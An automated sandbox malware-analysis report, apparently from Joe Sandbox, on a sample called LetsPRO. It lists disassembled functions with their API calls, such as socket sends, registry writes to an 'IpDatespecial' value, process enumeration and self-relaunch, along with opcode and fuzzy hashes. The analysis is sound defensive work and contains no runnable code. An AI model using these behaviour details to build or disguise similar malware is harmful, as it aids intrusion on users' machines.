                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocateHeap__vswprintf_malloc
                                        • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                        • API String ID: 3723585974-868042568
                                        • Opcode ID: 38cb5c742c89e28be066277f6fd37dde970e6c20ee41524badc4cbfae82990b0
                                        • Instruction ID: 8e5fee0726100420d79714d79edee4d8598f7ea95d4e989e21c8064d6404e4b8
                                        • Opcode Fuzzy Hash: 38cb5c742c89e28be066277f6fd37dde970e6c20ee41524badc4cbfae82990b0
                                        • Instruction Fuzzy Hash: 8AB1B175E00205AFCF18DF69D880AAEB7A5BF86310F0849BEDD199B346D731D941CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F31830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 03F31878
                                        • _free.LIBCMT ref: 03F318B6
                                        • _free.LIBCMT ref: 03F318F5
                                        • _free.LIBCMT ref: 03F31935
                                        • _free.LIBCMT ref: 03F3195D
                                        • _free.LIBCMT ref: 03F31981
                                        • _free.LIBCMT ref: 03F319B9
                                          • Part of subcall function 03F3F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03F43E4C,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F3F64F
                                          • Part of subcall function 03F3F639: GetLastError.KERNEL32(00000000,?,03F43E4C,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000), ref: 03F3F661
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: cf497c8a5661fb8c0fc8d532887530d656547491ba25e2415408295c4792faec
                                        • Instruction ID: 36c0af1022bd819413534ce6ac59bbbbf1a3984cc04b301d981e8a6387c2007d
                                        • Opcode Fuzzy Hash: cf497c8a5661fb8c0fc8d532887530d656547491ba25e2415408295c4792faec
                                        • Instruction Fuzzy Hash: DF512E76A01215CFD714EF58D584869BBA6FF8A31471980ADC51A5F321C732AD42CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F33870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 03F33883
                                        • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 03F338C4
                                        • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03F33931
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3395C
                                        • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 03F339F4
                                        • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03F33A22
                                        • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03F33A39
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                        • String ID:
                                        • API String ID: 3058130114-0
                                        • Opcode ID: 1003ef9220c9bbdb50e4db2be793b70659fa256b525b47553638a3f6bdbfd194
                                        • Instruction ID: 9f6ec38d8be1f0d8890e83cfb70d83ba9d249c61f0c3f50efa8dd7ae67d2eafa
                                        • Opcode Fuzzy Hash: 1003ef9220c9bbdb50e4db2be793b70659fa256b525b47553638a3f6bdbfd194
                                        • Instruction Fuzzy Hash: F451A278A05706DBDB20DF24CD84BAAB7E9FF06714F14491AD95ADB680DB34F940CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3B78C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 03F3B7A7
                                        • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 03F3B7B7
                                        • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 03F3B7CE
                                        • RegCloseKey.ADVAPI32(?,?,00000004), ref: 03F3B7D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$CloseDeleteOpen
                                        • String ID: Console$IpDatespecial
                                        • API String ID: 3183427449-1840232981
                                        • Opcode ID: 7d6339bda88f0fff514e3f0524570429ab08f8fe201bd47480dca2480fd89f33
                                        • Instruction ID: 052282bc4c75024236999af0d80f821b74063b2cb9cfea8eae93b7e1b0e37947
                                        • Opcode Fuzzy Hash: 7d6339bda88f0fff514e3f0524570429ab08f8fe201bd47480dca2480fd89f33
                                        • Instruction Fuzzy Hash: 69F08272245344BFD3249760AC5AF5ABB54F789711F504A0DFB8569181C661E100C655
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F502FC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 03F5031D
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                        • __getptd.LIBCMT ref: 03F5032E
                                        • __getptd.LIBCMT ref: 03F5033C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: MOC$RCC$csm
                                        • API String ID: 803148776-2671469338
                                        • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                        • Instruction ID: 2dd8edc6f3947767b8873cd8a6ba70b53010c04c158dcb8312e3232e00bf0223
                                        • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                        • Instruction Fuzzy Hash: 7DE09239914207CFD720DBA8C54AB683AD9BB54715F5944B2E90CCF221DB38D5948552
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F35080 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.KERNEL32(000002FF), ref: 03F350CA
                                        • WSASetLastError.WS2_32(0000139F), ref: 03F350E2
                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 03F350EC
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeave
                                        • String ID:
                                        • API String ID: 4082018349-0
                                        • Opcode ID: 34a61ab227068852d15488eee90b4ab37111d942016d6dca54187d69b92b52e4
                                        • Instruction ID: bd3e916f29bf94e65e81b1f8fa8c12e1638190fb86cb355259666afcdc6ce07c
                                        • Opcode Fuzzy Hash: 34a61ab227068852d15488eee90b4ab37111d942016d6dca54187d69b92b52e4
                                        • Instruction Fuzzy Hash: 24317E76A04749ABD714EF55DD85B6AB3A8EB8A710F004A5EFD1AC7780E736E800CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F44885 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 03F44891
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                        • __amsg_exit.LIBCMT ref: 03F448B1
                                        • __lock.LIBCMT ref: 03F448C1
                                        • InterlockedDecrement.KERNEL32(?), ref: 03F448DE
                                        • _free.LIBCMT ref: 03F448F1
                                        • InterlockedIncrement.KERNEL32(041C15B8), ref: 03F44909
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 3470314060-0
                                        • Opcode ID: aded343760bc3c007a7a82441fef24b3bbb3e8bc27e086e6022c84ee2ac28d81
                                        • Instruction ID: c8523e5c8357121660abbbcde01ea975d163b121a7775932ffda8520f6f9408c
                                        • Opcode Fuzzy Hash: aded343760bc3c007a7a82441fef24b3bbb3e8bc27e086e6022c84ee2ac28d81
                                        • Instruction Fuzzy Hash: 2401F536D02756EBE724FF66980479EBFA0BF04B10F080115EA14BB684DB789481CBD2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F39BA0 Relevance: 9.0, APIs: 6, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(?), ref: 03F39BD2
                                        • EnterCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39BE3
                                        • EnterCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39BF8
                                        • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03F39B7B), ref: 03F39C04
                                        • LeaveCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39C15
                                        • LeaveCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39C1C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                        • String ID:
                                        • API String ID: 4268643673-0
                                        • Opcode ID: f9b217120b20ca0cb8b7966473598c4715be39afd9237804c33c8f9529367f18
                                        • Instruction ID: 65f779b99dc1b718cc749e89453a89c6214e3b003f9972eee5f55139472ca6de
                                        • Opcode Fuzzy Hash: f9b217120b20ca0cb8b7966473598c4715be39afd9237804c33c8f9529367f18
                                        • Instruction Fuzzy Hash: 85012CB590130AFFC704EF6AD8A0419BBA4FE4921532486EEE619CB316C3B2C403CF95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F348D0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F348E1
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F348EC
                                        • Sleep.KERNEL32(00000258), ref: 03F348F9
                                        • CloseHandle.KERNEL32(?), ref: 03F34914
                                        • CloseHandle.KERNEL32(?), ref: 03F3491D
                                        • Sleep.KERNEL32(0000012C), ref: 03F3492E
                                          • Part of subcall function 03F33F60: GetCurrentThreadId.KERNEL32 ref: 03F33F65
                                          • Part of subcall function 03F33F60: send.WS2_32(?,03F549C0,00000010,00000000), ref: 03F33FC6
                                          • Part of subcall function 03F33F60: SetEvent.KERNEL32(?), ref: 03F33FE9
                                          • Part of subcall function 03F33F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03F33FF5
                                          • Part of subcall function 03F33F60: WSACloseEvent.WS2_32(?), ref: 03F34003
                                          • Part of subcall function 03F33F60: shutdown.WS2_32(?,00000001), ref: 03F3401B
                                          • Part of subcall function 03F33F60: closesocket.WS2_32(?), ref: 03F34025
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                        • String ID:
                                        • API String ID: 1019945655-0
                                        • Opcode ID: 7f352deec9e367c7eca51a21f72f699fa240b5fc291c1db6f57c6242f685dae2
                                        • Instruction ID: 6334e006153f3c4630a9f5e2ef24dc068d2db758429189a4f03c2af0d820b111
                                        • Opcode Fuzzy Hash: 7f352deec9e367c7eca51a21f72f699fa240b5fc291c1db6f57c6242f685dae2
                                        • Instruction Fuzzy Hash: E1F036762047196BD614EB69DC84D46F3E9EFC9720B154B09E26587294CA75E801CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F33300 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F33311
                                        • Sleep.KERNEL32(00000258), ref: 03F3331E
                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 03F33326
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F33332
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03F3333A
                                        • Sleep.KERNEL32(0000012C), ref: 03F3334B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                        • String ID:
                                        • API String ID: 3137405945-0
                                        • Opcode ID: 476d63cc4b0b1b4371a4e8d8e5b7fe1c62dd7bcdf8ec8148161350cd1f199035
                                        • Instruction ID: 07b5f8eae9941a99cbba13a617a36fe4f0067a33cddbc5991462bc031b442c06
                                        • Opcode Fuzzy Hash: 476d63cc4b0b1b4371a4e8d8e5b7fe1c62dd7bcdf8ec8148161350cd1f199035
                                        • Instruction Fuzzy Hash: D7F012762047186BD610ABA9DC84D56F3E8AF99734B204B09F365932D4CAB5E801CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F5095B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___BuildCatchObject.LIBCMT ref: 03F5096E
                                          • Part of subcall function 03F508C9: ___BuildCatchObjectHelper.LIBCMT ref: 03F508FF
                                        • _UnwindNestedFrames.LIBCMT ref: 03F50985
                                        • ___FrameUnwindToState.LIBCMT ref: 03F50993
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                        • String ID: csm$csm
                                        • API String ID: 2163707966-3733052814
                                        • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                        • Instruction ID: 7b0cb3325616a8b24e3a8f9dbb74c9d5ebc9ea60291e721646c15ffafed00c9a
                                        • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                        • Instruction Fuzzy Hash: 0101FB7540120ABBDF12AF51CD44EAABF6AFF09350F044014FE5819224DB36D9B1DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3B7E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 03F3B800
                                        • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 03F3B810
                                        • RegCloseKey.ADVAPI32(?), ref: 03F3B81B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValue
                                        • String ID: Console$IpDatespecial
                                        • API String ID: 849931509-1840232981
                                        • Opcode ID: a1ffd81796c282795c83f156190a9ebcf4c9712f8f31f494b20e4dd99a65a192
                                        • Instruction ID: 3fc1168c89291d304ef04a2ae73d0cf71b289b2dd8eec623b1a6d1f85be620e6
                                        • Opcode Fuzzy Hash: a1ffd81796c282795c83f156190a9ebcf4c9712f8f31f494b20e4dd99a65a192
                                        • Instruction Fuzzy Hash: 06E08673246344BFD314A660AD5FF9D7754F78C712F004A1DFB89A5141C552E400C665
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3B990 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03F3B9DA
                                        • _memset.LIBCMT ref: 03F3B9FB
                                        • _memset.LIBCMT ref: 03F3BA4B
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 03F3BA65
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 03F3BAB7
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                        • String ID:
                                        • API String ID: 2416807333-0
                                        • Opcode ID: 2f7b23a2e4097c39d47549937b6c2489b98e0c57b2a0d115208bd57b0ec5c722
                                        • Instruction ID: 709c57d09656be130588dd5f9a50399fb57d3460b4b8e9473acbed44e9941cce
                                        • Opcode Fuzzy Hash: 2f7b23a2e4097c39d47549937b6c2489b98e0c57b2a0d115208bd57b0ec5c722
                                        • Instruction Fuzzy Hash: 9341E371E00706AFEB20EF60CC95FAAB7B8EF16710F044295ED159B280E775AE41CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F40EEB Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _malloc.LIBCMT ref: 03F40EF9
                                          • Part of subcall function 03F3F673: __FF_MSGBANNER.LIBCMT ref: 03F3F68C
                                          • Part of subcall function 03F3F673: __NMSG_WRITE.LIBCMT ref: 03F3F693
                                          • Part of subcall function 03F3F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F3F6B8
                                        • _free.LIBCMT ref: 03F40F0C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free_malloc
                                        • String ID:
                                        • API String ID: 1020059152-0
                                        • Opcode ID: 07c3be17730d67f624e46d80bafeef681f95c72b2c74fe86d4863d6a6ab03140
                                        • Instruction ID: 33a2021afff8d451ca7fa86e5ed6e03bb41e447e2c8ce9a1c99487e64f9b4618
                                        • Opcode Fuzzy Hash: 07c3be17730d67f624e46d80bafeef681f95c72b2c74fe86d4863d6a6ab03140
                                        • Instruction Fuzzy Hash: 4C119436C5871BABCB21AF74AC1465ABF59DF412B0B144535FA499F250DF3089828794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F34B70 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03F34B83
                                        • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03F34B8D
                                        • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03F34BA0
                                        • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03F34BA3
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3168844106-0
                                        • Opcode ID: adebf0873f724ec10189cdd6bde5635c2fa830f0ac868554da20188c19ef2422
                                        • Instruction ID: 74836421f084a053d5ed66db9046199788a0b60a63a2cd9d187a9fc68e593f68
                                        • Opcode Fuzzy Hash: adebf0873f724ec10189cdd6bde5635c2fa830f0ac868554da20188c19ef2422
                                        • Instruction Fuzzy Hash: 7801627A6007189FE720EB3AFCC4B5BB7ECEB89354F054969E24683604C774E845CA64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025FE22F Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 025FE23B
                                          • Part of subcall function 025F997B: __getptd_noexit.LIBCMT ref: 025F997E
                                          • Part of subcall function 025F997B: __amsg_exit.LIBCMT ref: 025F998B
                                        • __getptd.LIBCMT ref: 025FE252
                                        • __amsg_exit.LIBCMT ref: 025FE260
                                        • __lock.LIBCMT ref: 025FE270
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 025FE284
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 745533e09c27ee42908da7af7db4068ea2eff67246d0882d63091b503b9baa5b
                                        • Instruction ID: b25670602b569b850c22fb8cf77b6e1e912127b35e8113be51c7b04c360ed711
                                        • Opcode Fuzzy Hash: 745533e09c27ee42908da7af7db4068ea2eff67246d0882d63091b503b9baa5b
                                        • Instruction Fuzzy Hash: 8AF02432D84B01DBE7A5BB78D80370E3BA2BF81B20F104209EB01671E0DF609541DE4E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F45006 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 03F45012
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                        • __getptd.LIBCMT ref: 03F45029
                                        • __amsg_exit.LIBCMT ref: 03F45037
                                        • __lock.LIBCMT ref: 03F45047
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 03F4505B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 69eef10119ec7e7da51eb9269c8dfe393d78b8db17dbd6b06d25fa8731aad550
                                        • Instruction ID: 2fdd16b930a6f433296cb3265490c51c479d681500c499d12a19ff5e9e7e8c9e
                                        • Opcode Fuzzy Hash: 69eef10119ec7e7da51eb9269c8dfe393d78b8db17dbd6b06d25fa8731aad550
                                        • Instruction Fuzzy Hash: CCF0B43ED05702DBE764FBACAC01B9E7FA0AF01B20F144119D619AF2D0DB788481DA96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3C910 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 03F3C932
                                        • GetCommandLineW.KERNEL32 ref: 03F3C938
                                        • GetStartupInfoW.KERNEL32(?), ref: 03F3C947
                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 03F3C96F
                                        • ExitProcess.KERNEL32 ref: 03F3C977
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                        • String ID:
                                        • API String ID: 3421218197-0
                                        • Opcode ID: 9a1dd1957495a9fb71901a942d6460730cfdb4e3ccceff8ebc864d2165dc8b94
                                        • Instruction ID: fddb29ce9cc88154451dddedd4d08001544da3f142c90e6669de9355df9868cc
                                        • Opcode Fuzzy Hash: 9a1dd1957495a9fb71901a942d6460730cfdb4e3ccceff8ebc864d2165dc8b94
                                        • Instruction Fuzzy Hash: 20F0307258531CBBEB24ABA4DC5DFEB7778FB04B00F100794B719A60D4DA706A44CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3F9B8 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 03F41CD0: _doexit.LIBCMT ref: 03F41CDC
                                        • ___set_flsgetvalue.LIBCMT ref: 03F3F9CA
                                          • Part of subcall function 03F43CA0: TlsGetValue.KERNEL32(00000000,03F43DF9,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000), ref: 03F43CA9
                                          • Part of subcall function 03F43CA0: DecodePointer.KERNEL32(?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06,0000000D), ref: 03F43CBB
                                          • Part of subcall function 03F43CA0: TlsSetValue.KERNEL32(00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06), ref: 03F43CCA
                                        • ___fls_getvalue@4.LIBCMT ref: 03F3F9D5
